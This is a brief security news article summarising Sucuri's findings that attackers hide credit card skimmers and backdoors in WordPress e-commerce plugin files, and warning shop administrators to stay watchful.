Credit card swipers are being introduced into e-commerce WordPress plugins at random, allowing them to remain undetected while collecting client payment information.
Card-stealing threat actors are ramping up their efforts to infect online retailers with covert skimmers as the holiday shopping season approaches, so administrators should be watchful.
Injecting card skimmers into WordPress plugin files is the latest trend, as it avoids the heavily watched ‘wp-admin’ and ‘wp-includes’ core directories, where most injections are short-lived.
According to new research from Sucuri, credit card fraud is carried out by first getting into WordPress sites and introducing a backdoor for persistence.
Even if the administrator install the newest security updates for WordPress and installed plugins, the hackers can still gain access to the site using these backdoors.
When the backdoor is used in the future, the attackers will look for a list of administrator users and access the site using their authorization cookie and current user login.
When the analysts examined the code, they discovered references to WooCommerce and undefined variables in an image optimization plugin. This plugin is free of vulnerabilities and is thought to have been chosen at random by threat actors.
Sucuri was able to determine that one of these undefined variables refers to a domain located on an Alibaba server in Germany using PHP get defined vars()’.
This domain had no connection to the compromised website they were investigating, which was based in North America.
The 404-page plugin on the same site featured a second injection, which contained the actual credit card skimmer utilising the same approach of hidden variables in unobfuscated code.